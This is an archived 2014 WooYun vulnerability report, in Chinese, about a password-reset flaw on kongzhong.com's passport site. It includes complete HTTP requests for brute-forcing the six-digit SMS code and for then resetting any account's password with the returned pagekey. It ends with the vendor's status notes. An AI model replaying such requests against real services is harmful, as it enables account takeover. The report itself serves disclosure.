乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-16: 细节已通知厂商并且等待厂商处理中 2014-01-21: 厂商已经主动忽略漏洞,细节向公众公开
rt
通过安全手机找回密码时, 验证6位数手机验证码,可爆破
POST /pwdback/pwdchange HTTP/1.1Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-powerpoint, application/vnd.ms-excel, */*Referer: http://passport.kongzhong.com/pwdback/pwdmobileback/pwdback_mobileAccept-Language: zh-CNContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.2)Host: passport.kongzhong.comContent-Length: 72Proxy-Connection: Keep-AlivePragma: no-cacheCookie:******Connection: closephone=手机号&vcode=6位数验证码&pwdbackType=phone&useraccount=账号
正确验证码返回数据包长度不同 同时返回pagekey利用以下get包重置密码
GET /ajax/user/changepwd?useraccount=手机号&pwd=新密码&repwd=新密码&pagekey=BDNabARsU2UAMAFsW2oFbVMwUjUGMVsaACUHOAJvBmwAY1cNBngAbAVoDzoDYltxVG0DPwRqWz1SKVZiVzoBaAQwWm8EZVNgAC8BaltsBXhTM1I0BiZbawBsB2oCNQYyADxXZwZj&pwdbacktype=phone&sid= HTTP/1.1x-requested-with: XMLHttpRequestAccept-Language: zh-cnReferer: http://passport.kongzhong.com/pwdback/pwdchangeAccept: application/json, text/javascript, */*; q=0.01Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.2)Host: passport.kongzhong.comProxy-Connection: Keep-AliveCookie:******
建议多查查其他地方是否有缺陷
危害等级:无影响厂商忽略
忽略时间:2014-01-21 10:21
2014-01-21:谢谢您的关注,我们会尽快修复。